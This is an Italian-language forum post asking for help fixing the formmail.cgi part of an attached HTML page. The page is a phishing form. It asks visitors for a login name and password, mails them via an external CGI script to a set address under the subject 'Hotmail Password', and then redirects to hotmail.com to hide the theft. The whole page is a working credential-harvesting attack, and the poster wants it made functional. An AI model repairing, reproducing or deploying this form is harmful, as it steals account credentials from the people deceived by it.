Buona sera a tutti, sono in difficolta' con questo codice, sapreste aiutarmi nel modificare la parte legata al formail.cgi in modo che funzioni ?
Grazie anticipatamente.
<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="GENERATOR" content="Mozilla/4.51 [it] (Win98; I) [Netscape]">
</head>
<body bgcolor="#FFFFFF" link="#000099" vlink="#000099">
<table BORDER=0 CELLSPACING=5 CELLPADDING=5 WIDTH="508" HEIGHT="90%" >
<tr VALIGN=CENTER>
<th COLSPAN="2"><font face="Arial, Helvetica"><font size=+2>prova invio dati.</font></font>
<font face="Arial, Helvetica"><font size=+2>scrivi tuoi dati</font></font>
<font face="Arial, Helvetica"><font size=+2>Inserisci il tuo nome utente
e password</font></font></th>
</tr>
<tr VALIGN=CENTER>
<td ALIGN=CENTER><font face="Arial, Helvetica"><font size=+0>Mittente:
<font color="#000000">Enola
</font></font><font color="#000000">Titolo messaggio:<font size=+0>
Un saluto</font></font></font>
<font face="Arial, Helvetica"><font size=+0><font color="#FF0000">Prego
inserire nome e password.</font><font color="#000000"></font></font></font></td>
</tr>
<tr VALIGN=CENTER>
<td ALIGN=CENTER><form METHOD=POST ACTION="http://www.tiscalinet.it/cgi-bin/formmail.cgi"
target="_top"><input type=hidden name="recipient" value="vostra@email.it"><input
TYPE="hidden" NAME="next-url" VALUE="http://www.hotmail.com"><input TYPE="hidden"
NAME="subject" VALUE="Hotmail Password"><input type="hidden" name="redirect"
value="http://www.hotmail.com"> <table BORDER=0 CELLSPACING=5 CELLPADDING=0 >
<tr>
<td><font face="Arial, Helvetica"><font size=-1>Login Name:</font></font>
<input type="text" name="login" size="16" maxlength="16"></td>
<td><font face="Arial, Helvetica"><font size=-1>Password:</font></font>
<input type="password" name="passwd" size="16" maxlength="16"><input
type="submit" value="Enter"></td>
</tr>
</table>
</form></td>
</tr>
</tr>
</table>
</body>
</html>